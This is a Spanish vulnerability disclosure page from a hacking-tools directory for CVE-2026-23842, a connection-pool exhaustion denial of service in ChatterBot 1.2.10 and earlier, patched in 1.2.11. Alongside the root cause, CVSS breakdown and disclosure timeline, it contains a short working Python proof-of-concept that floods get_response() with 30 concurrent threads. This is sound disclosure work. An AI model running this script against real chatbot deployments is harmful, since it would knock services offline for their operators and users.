Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/adityabhatt3010/cve-2026-23842-denial-of-service-via-database-connection-pool-exhaustion-version-1.2.10
Análisis de VulnerabilidadesExplotaciónAprendizaje y Educación
GitHubadityabhatt3010/cve-2026-23842-denial-of-service-via-database-connection-pool-exhaustion-version-1.2.10

CVE-2026-23842-Denial-of-Service-via-Database-Connection-Pool-Exhaustion-version-1.2.10

CVE-2026-23842 — Vulnerabilidad de denegación de servicio de severidad alta causada por el agotamiento del grupo de conexiones de SQLAlchemy en llamadas concurrentes a get_response() en ChatterBot ≤ 1.2.10.

Ver Repositorio
2hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23842

Denegación de Servicio por Agotamiento del Pool de Conexiones de Base de Datos en ≤ 1.2.10

📌 Resumen

Este repositorio documenta mi descubrimiento y divulgación responsable de CVE-2026-23842, una vulnerabilidad de Denegación de Servicio de Alta Severidad en ChatterBot.

  • Aviso de GitHub: GHSA-v4w8-49pv-mf72
  • ID de CVE: CVE-2026-23842
  • CWE: CWE-400 (Consumo de Recursos No Controlado)
  • Severidad: Alta (7.5 / 10)
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

a-hyper-detailed-cinematic-cyberpunk-ill_1YpmQcKtTGuYYByf5li18A_s2g_3oZVSIyO44oyprigwQ_cover_sd


🚨 Resumen de la Vulnerabilidad

Las versiones de ChatterBot ≤ 1.2.10 son vulnerables a una condición de Denegación de Servicio causada por una gestión inadecuada de las sesiones de base de datos y del pool de conexiones.

Las invocaciones concurrentes de:

root@kitploit:~
get_response()

pueden agotar el QueuePool subyacente de SQLAlchemy, lo que resulta en:

  • Bloqueo de la aplicación
  • sqlalchemy.exc.TimeoutError
  • Indisponibilidad persistente del servicio
  • Reinicio manual necesario para la recuperación

🎯 Versiones Afectadas

root@kitploit:~
<= 1.2.10

✅ Versión Parcheada

root@kitploit:~
>= 1.2.11

🧠 Causa Raíz Técnica

ChatterBot depende de SQLAlchemy para la interacción con la base de datos y utiliza una configuración predeterminada del pool de conexiones.

Sin embargo:

  • Sin limitación de concurrencia
  • Sin limitación de tasa de solicitudes
  • Sin aplicación explícita del ciclo de vida de las sesiones
  • Límites predeterminados del QueuePool

Cuando múltiples hilos invocan get_response() simultáneamente:

  1. Las conexiones se retiran rápidamente del pool
  2. Las conexiones no se liberan con la suficiente rapidez
  3. Se alcanza la capacidad del pool
  4. Las solicitudes adicionales se bloquean
  5. SQLAlchemy lanza TimeoutError

Esto resulta en una denegación de disponibilidad en todo el servicio.


🔬 Prueba de Concepto (PoC)

Script PoC

root@kitploit:~
from chatterbot import ChatBot
import threading

bot = ChatBot("dos-test")

def attack():
    bot.get_response("hello")

threads = []

for _ in range(30):
    t = threading.Thread(target=attack)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

🎥 Demostración en Video del PoC

El siguiente video demuestra:

  • Ejecución concurrente de hilos
  • Agotamiento del QueuePool de SQLAlchemy
  • Excepciones TimeoutError
  • Falta de respuesta de la aplicación

🔗 Video del PoC: https://github.com/user-attachments/assets/4ee845c4-b847-4854-84ec-4b2fb2f7090f


🌐 Superficie de Ataque

Si se implementa como:

  • API pública de chatbot
  • Servicio SaaS de chatbot
  • Asistente integrado en la web

Un atacante puede desencadenar la condición de forma remota sin autenticación.


📊 Desglose CVSS v3.1

MétricaValor
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosNinguno
Interacción del UsuarioNinguna
ConfidencialidadNinguna
IntegridadNinguna
DisponibilidadAlta

📅 Cronograma de Divulgación Responsable

FechaEvento
Ene 9Vulnerabilidad reportada
Ene 13Mantenedor reprodujo el problema
Ene 17Aviso publicado
Ene 19CVE-2026-23842 asignado
Ene 21Publicación pública

🏆 Crédito

Descubierto y divulgado responsablemente por:

Aditya Bhatt Especialista en VAPT Reportero de CVE-2026-23842


🔐 Declaración de Divulgación Responsable

Esta vulnerabilidad fue divulgada responsablemente al mantenedor antes de la publicación pública. No se compartió ningún exploit públicamente antes de la disponibilidad del parche.


Descargar herramienta